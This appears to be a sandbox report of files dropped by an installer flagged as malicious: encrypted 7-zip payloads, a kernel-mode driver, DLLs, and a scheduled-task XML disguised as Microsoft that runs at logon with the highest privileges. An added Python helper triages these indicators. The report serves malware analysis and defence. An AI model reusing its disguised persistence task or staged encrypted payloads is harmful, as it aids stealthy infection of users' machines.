                                  SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                                  SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                                  SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                                  Malicious:false
                                  Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...
                                  Process:C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                                  File Type:7-zip archive data, version 0.4
                                  Category:dropped
                                  Size (bytes):74960
                                  Entropy (8bit):7.997593701656546
                                  Encrypted:true
                                  SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                                  MD5:059BA7C31F3E227356CA5F29E4AA2508
                                  SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                                  SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                                  SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                                  Malicious:false
                                  Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.
                                  Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):29730
                                  Entropy (8bit):7.994290657653607
                                  Encrypted:true
                                  SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                                  MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                                  SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                                  SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                                  SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                                  Malicious:false
                                  Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.
                                  Process:C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                                  File Type:7-zip archive data, version 0.4
                                  Category:dropped
                                  Size (bytes):29730
                                  Entropy (8bit):7.994290657653608
                                  Encrypted:true
                                  SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                                  MD5:A9C8A3E00692F79E1BA9693003F85D18
                                  SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                                  SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                                  SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                                  Malicious:false
                                  Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8
                                  Process:C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                                  File Type:7-zip archive data, version 0.4
                                  Category:dropped
                                  Size (bytes):249984
                                  Entropy (8bit):7.999161200123717
                                  Encrypted:true
                                  SSDEEP:6144:BBfinFeH/n/oxa9p5nKMF7W9uvN/jl3eTYjg0c+YRRbMQL:BBfiFePQxa9pFhYmN/S0rgRZ
                                  MD5:7A1992BF55B34786E192E7FF0E870B6C
                                  SHA1:CF5E5EB0C9133A9E6162731440462B88191F4672
                                  SHA-256:187BCFD1E40E2DF985E8F3456ECC94347C608C8151BF7F1A4524D66B118A7B60
                                  SHA-512:48792B91D46D070A6B4D97D072CCF302452C163A5576D419398FAD3D958ADF19B5739BC026068984C149F20051CBEB0DAB91EFF47468E6AD7EBEB2B08003F29D
                                  Malicious:false
                                  Preview:7z..'...;.(J .......@.......>.~..r"&9.d.[|6..]T..a.]...4..6.......I".w....s...V...l..;B..?..'.5.y.."..8. .?YM....9.]..^.....!..8C$..=1... 3..V.}.e3._.............UI...m..%....jl....g..~O....R..#|.7.M....h.<....X(yCa...).5..\8.......= zg....?U..8...9.]B}...dWm>.|../..=..@.. ....@O..H|.C*..oe.H...;..`.t..a....p.$...Y-n.7{..XX.G.Ex.|.>.`.(G..e.Lz......]r....?.....x.B.g..5....\.......h...:u...6...q.........f|.L....z.~..s..X.]...G<k&....."c9...}..&.t!...<.+.#..2..w.<........T..7...%..4........ly!.f....d...}...(P...O.EHU|i9...a.'%...X.4...W...#....[....>..TD"}...|.].Np..E=b...d3...l....K..9%;.0...........R+..fQ...#0...`...J.......YEtk-...7......=k...b;.H&...^(\t....Qg..2.....z...tb.h..W.u..'.=..u..h_H. W.../.Y...7.....n.'p.Ys.uV<m#....K#.#;.0B..b&=9..Q./7..L.;.=3...8i.=2M.<.............Y.h._.E...Ft..TS.....=....O.*...E....y..........z,..F..1.K...d..l.CYE.x..E@...O\.fQ.....C.j#..B.x.Qs.?..N34'....'.S<.....gC!x.........0......`...((6Di... F|.
                                  Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):63640
                                  Entropy (8bit):6.482810107683822
                                  Encrypted:false
                                  SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                                  MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                                  SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                                  SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                                  SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 9%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................
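A triage pass over the entries above, added here as an example and not part of the Joe Sandbox report or of any project. It parses records in the flattened `Key:Value` form the listing uses and flags three things a reviewer would want surfaced: each 7-zip archive dropped by the installer `.tmp` that is followed by a `data` file from `7zr.exe` of exactly the same size and near-8.0 entropy (an extraction that neither shrinks the output nor lowers its entropy points to a wrapped, still-encoded payload rather than a decompressed one), the native-mode PE32+ image (a kernel driver) written by `7zr.exe`, and any blob whose preview is a Task Scheduler XML definition. The sizes, entropies, hashes and file types in `SAMPLE_LISTING` are copied from the listing; the pairing heuristic, the 7.9 entropy threshold and the finding tags are the example's own choices.

```python
"""Triage helper for a sandbox 'dropped files' listing.

Added example, not part of the report. It reads records in the flattened
'Key:Value' form used in the listing and flags:
  * a 7-zip archive followed by a 'data' file written by 7zr.exe with the
    same size and near-8.0 entropy (extraction that does not decompress);
  * a native-mode PE32+ image (a driver) written to disk;
  * a blob whose preview is a Task Scheduler XML definition.
SAMPLE_LISTING is constructed from fields visible in the listing.
"""
import math
from collections import Counter


def parse_records(text):
    """One record per 'Process:' line; later 'Key:Value' lines attach to it."""
    records, cur = [], None
    for raw in text.splitlines():
        if ":" not in raw:
            continue
        key, _, value = raw.strip().partition(":")  # first ':' only, so paths survive
        key = key.strip().lower()
        if key == "process":
            cur = {}
            records.append(cur)
        if cur is not None:
            cur[key] = value.strip()
    for r in records:
        r["size (bytes)"] = int(r.get("size (bytes)", 0))
        r["entropy (8bit)"] = float(r.get("entropy (8bit)", 0))
    return records


def shannon_entropy(data):
    """Bits per byte, the same 8-bit measure the listing reports (for raw files)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def triage(records, high_entropy=7.9):
    """Return (tag, sha256, detail) tuples for the patterns described above."""
    findings = []
    archives = [r for r in records if r.get("file type", "").startswith("7-zip archive")]
    outputs = [r for r in records
               if r["process"].lower().endswith("7zr.exe") and r.get("file type") == "data"]
    for a in archives:
        for o in outputs:
            if o["size (bytes)"] == a["size (bytes)"] and \
               min(a["entropy (8bit)"], o["entropy (8bit)"]) >= high_entropy:
                findings.append(("opaque-extraction", a["sha-256"], o["sha-256"]))
    for r in records:
        if r.get("file type", "").startswith("PE32+ executable (native)"):
            findings.append(("native-driver", r["sha-256"], r["process"]))  # kernel driver on disk
        if "<Task xmlns=" in r.get("preview", ""):
            findings.append(("scheduled-task-xml", r["sha-256"], r["process"]))
    return findings


# Constructed from the listing: one archive/7zr.exe pair, the driver, the task XML.
SAMPLE_LISTING = """
Process:C:\\Users\\user\\AppData\\Local\\Temp\\is-2NRBA.tmp\\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
File Type:7-zip archive data, version 0.4
Size (bytes):56546
Entropy (8bit):7.996966859255979
SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
Preview:7z..'....O; ........2.......D.X..Z.2..7nf
Process:C:\\Program Files (x86)\\Windows NT\\7zr.exe
File Type:data
Size (bytes):56546
Entropy (8bit):7.996966859255975
SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
Preview:.@S....c...l ...............3...Q...R]
Process:C:\\Program Files (x86)\\Windows NT\\7zr.exe
File Type:PE32+ executable (native) x86-64, for MS Windows
Size (bytes):63640
Entropy (8bit):6.482810107683822
SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
Preview:MZ......................@...
Process:C:\\Users\\user\\AppData\\Local\\Temp\\is-2NRBA.tmp\\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
File Type:data
Size (bytes):4096
Entropy (8bit):3.344834847024567
SHA-256:84460DE817C9A6637650C7ED83D15DD14836FB841FF9790D4F2D1A8D6BAAB0ED
Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
"""
```

Running `triage(parse_records(SAMPLE_LISTING))` yields one `opaque-extraction` pair, one `native-driver` and one `scheduled-task-xml` finding. Against the full listing the size match repeats for the 31890-, 74960- and 29730-byte pairs; the 249984-byte archive has no matching `7zr.exe` output, so it is not paired. `shannon_entropy` is there for checking the reported figures on the files themselves if you have them.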
                                  Process:C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):4096
                                  Entropy (8bit):3.344834847024567
                                  Encrypted:false
                                  SSDEEP:48:dXKLzDlnbL6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDlnKwhldOVQOj6dKbKsz7
                                  MD5:7F252B19B6E96247184F55570325E9FA
                                  SHA1:E6D4AD432CB4864C0E1A08FB15255F7973807B3D
                                  SHA-256:84460DE817C9A6637650C7ED83D15DD14836FB841FF9790D4F2D1A8D6BAAB0ED
                                  SHA-512:A5741E4F5095BB24A28E5909CC659CB53535BD1E7A2555FA9D2660155F8CA80F96136E2CA589CCD2154FCF264B8FD525782B8C9752022B986F20D3F1454496EF
                                  Malicious:false
                                  Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvai
                                  Process:C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                                  File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):5649408
                                  Entropy (8bit):6.392614480390128
                                  Encrypted:false
                                  SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                                  MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                                  SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                                  SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                                  SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):64
                                  Entropy (8bit):1.1628158735648508
                                  Encrypted:false
                                  SSDEEP:3:Nlllul5mxllp:NllU4x/
                                  MD5:3A925CB766CE4286E251C26E90B55CE8
                                  SHA1:3FA8EE6E901101A4661723B94D6C9309E281BD28
                                  SHA-256:4E844662CDFFAAD50BA6320DC598EBE0A31619439D0F6AB379DF978FE81C7BF8
                                  SHA-512:F348B4AFD42C262BBED07D6BDEA6EE4B7F5CFA2E18BFA725225584E93251188D9787506C2AFEAC482B606B1EA0341419F229A69FF1E9100B01DE42025F915788
                                  Malicious:false
                                  Preview:@...e................................................@..........
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):6144
                                  Entropy (8bit):4.720366600008286
                                  Encrypted:false
                                  SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                  MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                  SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                  SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                  SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):3598848
                                  Entropy (8bit):7.004949099807939
                                  Encrypted:false
                                  SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                  MD5:1D1464C73252978A58AC925ECE57F0FB
                                  SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                  SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                  SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                  Malicious:false
                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):3366912
                                  Entropy (8bit):6.530548291878271
                                  Encrypted:false
                                  SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                  MD5:9902FA6D39184B87AED7D94A037912D8
                                  SHA1:F5D8470ACF5DFF81C6D3364A8943B24E3DB48D95
                                  SHA-256:43D9F1FA3BDA81C618CC23FBB4E9D8551305AF0090A3D452C4070F938F6BCFAC
                                  SHA-512:BC97E2C379C464F821AF0E38630DB65165F4E91A1105A3C7DABCC5E61CC9EAAB1522AC82E749AA4FEFC5A9E21A295A0A59CFE99D6BC3980F9C89F00AF5B8CF75
                                  Malicious:true
                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                  Process:C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):6144
                                  Entropy (8bit):4.720366600008286
                                  Encrypted:false
                                  SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                  MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                  SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                  SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                  SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):3598848
                                  Entropy (8bit):7.004949099807939
                                  Encrypted:false
                                  SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                  MD5:1D1464C73252978A58AC925ECE57F0FB
                                  SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                  SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                  SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                  Malicious:false
                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
